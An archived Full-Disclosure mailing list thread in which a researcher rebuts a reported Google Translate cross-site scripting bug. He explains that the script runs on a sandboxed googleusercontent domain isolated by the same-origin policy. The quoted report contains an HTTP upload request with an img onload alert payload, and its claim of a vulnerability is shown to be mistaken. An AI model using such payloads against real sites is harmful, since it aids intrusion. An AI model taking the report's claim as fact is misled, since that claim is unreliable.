lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAAnPYQ7zU7phwwdm6ehVTQxNNg1JnOTcKpLGdPY=M3ZhTa-xiA@mail.gmail.com>
Date: Fri, 27 Nov 2015 10:08:44 +0000
From: Gynvael Coldwind <gynvael@...dwind.pl>
To: Francisco Javier Santiago Vázquez
 <franciscojaviersantiagovazquez@...il.com>, fulldisclosure@...lists.org
Subject: Re: [FD] Google Translator affected by Cross-Site Scripting
	vulnerability

Hi Francisco,

Unfortunately your disclosure is factually wrong.

Please note that even the packet you are citing says "Host:
translate.googleusercontent.com" - this is not the same domain as
translate.google.es (or translate.google.com), therefore, due to the
JavaScript same-origin policy (
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy)
it's a different origin. Which means that scripts executed from
translate.googleusercontent.com do not have access to cookies/DOM/etc of
Google Translate main domains (translate.google.es, etc).
And there are no interesting cookies / things to do on
translate.googleusercontent.com.

Given the above, as Google surely told you, you didn't find an XSS in
Google Translate, you found an XSS in a sandbox domain, which was designed
to allow execution of potentially hostile JavaScript code. Hey, you even
can find the *.googleusercontent.com domain in Google's sandboxed domain
listing:
https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain

Keep in mind that when doing XSS-related security research a popping out
alert box tells you that you can execute code, but not if it's a
vulnerability - for that you need to verify the domain (and maybe
schema/port as well, depending on your case), e.g. by doing
alert(document.domain) instead of alert('XSS en Google AUDIT') ;)

Cheers,
Gynvael

On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez <
franciscojaviersantiagovazquez@...il.com> wrote:

> I. VULNERABILITY
> -------------------------
> Vulnerability Cross-Site Scripting Translator Google affected by Cross-Site
> Scripting vulnerability (XSS)
> Google assumes the vulnerability.
>
>
> II. DESCRIPTION
> -------------------------
> - Firstly, go to https://translate.google.es/?hl=es  website and click in
> "Document   Translate"
> - Upload the proof of concept
> - Finally, we can display the Cross-Site Scripting (XSS)
>
>
> III. PROOF OF CONCEPT
> -------------------------
> POST /translate_f HTTP/1.1
> Host: translate.googleusercontent.com
> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101
> Firefox/39.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
> Accept-Encoding: gzip, deflate
> Referer: https://translate.google.es/?hl=es
> Connection: keep-alive
> Content-Type: multipart/form-data;
> boundary=---------------------------147452561017500
> Content-Length: 1095
>
> -----------------------------147452561017500
> Content-Disposition: form-data; name="sl"
>
> en
> -----------------------------147452561017500
> Content-Disposition: form-data; name="tl"
>
> es
> -----------------------------147452561017500
> Content-Disposition: form-data; name="js"
>
> y
> -----------------------------147452561017500
> Content-Disposition: form-data; name="prev"
>
> _t
> -----------------------------147452561017500
> Content-Disposition: form-data; name="hl"
>
> es
> -----------------------------147452561017500
> Content-Disposition: form-data; name="ie"
>
> UTF-8
> -----------------------------147452561017500
> Content-Disposition: form-data; name="text"
>
>
> -----------------------------147452561017500
> Content-Disposition: form-data; name="file"; filename="poc.html"
> Content-Type: text/html
>
> <img src="
>
> http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg
> "
> onload="alert('XSS en Google AUDIT')"</img>
> -----------------------------147452561017500
> Content-Disposition: form-data; name="edit-text"
>
>
> -----------------------------147452561017500--
>
>
> IV. SYSTEMS AFFECTED
> -------------------------
> The vulnerability affects the Google Translator.
>
>
> VI. CREDITS
> -------------------------
> These vulnerabilities have been discovered by
> Francisco Javier Santiago Vázquez (
> https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050
> ).
> (https://twitter.com/n0ipr0cs).
>
>
> VII. DISCLOSURE TIMELINE
> -------------------------
> Nov       02, 2015: Vulnerability acquired by Francisco Javier Santiago
> Vázquez. aka "n0ipr0cs"
> Nov       03, 2015 Responsible disclosure to Google Security Team.
> Nov       03, 2015 Google assumes the vulnerability
> Nov       26, 2015 Disclosure
>
>
> VIII. Links
> ------------------------
> POC :-
>
> http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html
>
>
>
>
>
>
>
> *Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
> <
> http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6
> >
> <http://estacioninformatica.blogspot.com.es/>
> <https://twitter.com/n0ipr0cs>*
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ